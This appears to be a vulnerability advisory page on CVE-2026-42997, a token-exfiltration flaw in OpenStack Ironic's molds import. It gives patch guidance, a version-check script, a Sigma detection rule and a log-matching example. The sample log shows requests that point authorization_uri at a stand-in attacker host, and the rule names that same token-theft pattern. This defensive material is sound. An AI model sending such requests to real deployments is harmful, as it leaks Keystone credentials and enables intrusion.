OpenStack Ironic Vulnerability CVE-2026-42997 Exposes Keystone Tokens

A critical vulnerability, CVE-2026-42997, has been identified in OpenStack Ironic, affecting versions prior to 35.0.1. According to the National Vulnerability Database, this flaw allows a malicious user to abuse the idrac molds import process to request that authorization tokens be sent to an arbitrary remote endpoint. The credentials forwarded are either a time-limited Keystone token, which grants broad access to every OpenStack service Ironic is authorized for, or the basic credentials configured for mold storage.

This is a serious issue. The National Vulnerability Database assigns it a CVSS score of 7.7 (HIGH), with a vector of CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N. It’s a network-exploitable vulnerability requiring low privileges but leading to high confidentiality impact. Attackers can effectively siphon off powerful, time-limited Keystone tokens, which can then be used to pivot deeper into the OpenStack environment. The fixed versions are 26.1.6, 29.0.5, 32.0.1, and 35.0.1.

For defenders, this means a directly exposed attack surface within Ironic’s import functionality. An attacker who gains even low-level access to the OpenStack environment could leverage this to elevate privileges and access other services. The core risk is the exfiltration of a Keystone token, which acts as a golden ticket for further compromise. Patching is non-negotiable.

What This Means For You

  • If your organization uses OpenStack Ironic, verify your version immediately. Releases on the 26.x, 29.x and 32.x branches older than 26.1.6, 29.0.5 and 32.0.1 respectively, and any other release older than 35.0.1, are vulnerable to **CVE-2026-42997**. Prioritize patching to one of the fixed versions to prevent unauthorized exfiltration of Keystone tokens and subsequent privilege escalation within your OpenStack environment. Audit your Ironic import logs for suspicious activity.
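The version check from the bullet above, as an added example (not from the advisory or the Ironic project): it encodes the affected ranges the advisory states (26.x before 26.1.6, 29.x before 29.0.5, 32.x before 32.0.1, everything else before 35.0.1) and treats a pbr-style ".devN" suffix as preceding the final release, as PEP 440 orders it. Hostnames and versions in the demo are constructed.

```python
import re

# Fixed releases named in the advisory, keyed by the stable branch's major
# version; anything not on one of these branches is fixed from 35.0.1.
FIXED_BY_BRANCH = {26: (26, 1, 6), 29: (29, 0, 5), 32: (32, 0, 1)}
FIXED_MASTER = (35, 0, 1)

_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)(\.dev\d+)?\s*$")


def parse_version(text):
    """Return (major, minor, patch, final) for an Ironic version string.

    A '.devN' suffix sorts before the final release (PEP 440), so
    final=0 for dev builds and 1 for released versions.
    """
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError("unrecognised Ironic version: %r" % text)
    major, minor, patch = (int(g) for g in m.groups()[:3])
    return (major, minor, patch, 0 if m.group(4) else 1)


def fixed_version_for(major):
    """Fixed release that applies to a given major version."""
    return FIXED_BY_BRANCH.get(major, FIXED_MASTER)


def is_vulnerable(text):
    """True when the version precedes the fixed release for its branch."""
    v = parse_version(text)
    return v < fixed_version_for(v[0]) + (1,)


def triage(inventory):
    """Map host -> verdict for a dict of {host: ironic_version}."""
    result = {}
    for host, version in inventory.items():
        if is_vulnerable(version):
            target = fixed_version_for(parse_version(version)[0])
            result[host] = "vulnerable (upgrade to %s)" % ".".join(map(str, target))
        else:
            result[host] = "fixed"
    return result


if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    demo = {"ironic-a": "26.1.5", "ironic-b": "27.0.0",
            "ironic-c": "35.0.1.dev3", "ironic-d": "35.0.1"}
    for host, verdict in triage(demo).items():
        print(host, verdict)
```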

🛡️ Detection Rules

Level: high · ATT&CK T1190 (Initial Access)

CVE-2026-42997 - OpenStack Ironic Molds Remote Token Request

Sigma YAML:
title: CVE-2026-42997 - OpenStack Ironic Molds Remote Token Request
id: scw-2026-05-05-ai-1
status: experimental
level: high
description: |
  Detects a POST request to the '/v1/molds' endpoint carrying an
  'authorization_uri' parameter, the pattern associated with CVE-2026-42997
  in OpenStack Ironic, where a user can request that authorization be sent
  to a remote endpoint and thereby expose Keystone tokens.
author: SCW Feed Engine (AI-generated)
date: 2026-05-05
references:
  - https://shimiscyberworld.com/posts/nvd-CVE-2026-42997/
tags:
  - attack.initial_access
  - attack.t1190
logsource:
  category: webserver
detection:
  # All three selection fields must match (AND); list values are alternatives (OR).
  selection:
    cs-uri|contains:
      - '/v1/molds'
    cs-method:
      - 'POST'
    cs-uri-query|contains:
      - 'authorization_uri='
  condition: selection
falsepositives:
  - Legitimate administrative activity
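The rule's selection evaluated over W3C extended-format webserver logs, as an added example that is not part of the page's feed output: it shows the Sigma semantics the rule relies on (keys ANDed, list values ORed, case-insensitive matching). The log lines are constructed, and the #Fields header deliberately uses the rule's own cs-* field names.

```python
# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
#Software: constructed for this example
#Fields: date time c-ip cs-method cs-uri cs-uri-query sc-status
2026-05-05 22:10:01 192.0.2.10 GET /v1/nodes - 200
2026-05-05 22:10:07 192.0.2.20 POST /v1/molds authorization_uri=http://203.0.113.7/collect 202
2026-05-05 22:10:09 192.0.2.20 POST /v1/molds - 202
2026-05-05 22:10:12 192.0.2.30 post /V1/MOLDS Authorization_URI=http://203.0.113.7/x 202
"""

# The rule's selection: each key must match (AND); values in a list are
# alternatives (OR). Sigma string matching is case-insensitive by default.
SELECTION = {
    "cs-uri|contains": ["/v1/molds"],
    "cs-method": ["POST"],
    "cs-uri-query|contains": ["authorization_uri="],
}


def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields names."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other directives and blank lines carry no request
        elif fields:
            records.append(dict(zip(fields, line.split())))
    return records


def field_matches(record, key, wanted):
    """Apply one selection entry, honouring the '|contains' modifier."""
    name, _, modifier = key.partition("|")
    value = record.get(name, "").lower()
    for candidate in wanted:
        candidate = candidate.lower()
        if modifier == "contains" and candidate in value:
            return True
        if modifier == "" and candidate == value:
            return True
    return False


def find_hits(text, selection=SELECTION):
    """Return the records for which every selection entry matches."""
    return [r for r in parse_w3c(text)
            if all(field_matches(r, k, v) for k, v in selection.items())]
```

The selection only sees the query string; an authorization_uri carried in a POST body would need a log source that records request bodies, which a plain webserver access log does not.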

Indicators of Compromise

ID             | Type                   | Indicator
CVE-2026-42997 | Information Disclosure | OpenStack Ironic before 35.0.1
CVE-2026-42997 | Information Disclosure | OpenStack Ironic 26.x before 26.1.6
CVE-2026-42997 | Information Disclosure | OpenStack Ironic 29.x before 29.0.5
CVE-2026-42997 | Information Disclosure | OpenStack Ironic 32.x before 32.0.1
CVE-2026-42997 | Information Disclosure | idrac component in OpenStack Ironic

Source & Attribution

Source Platform: NVD
Channel: National Vulnerability Database
Published: May 05, 2026 at 22:16 UTC

This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.
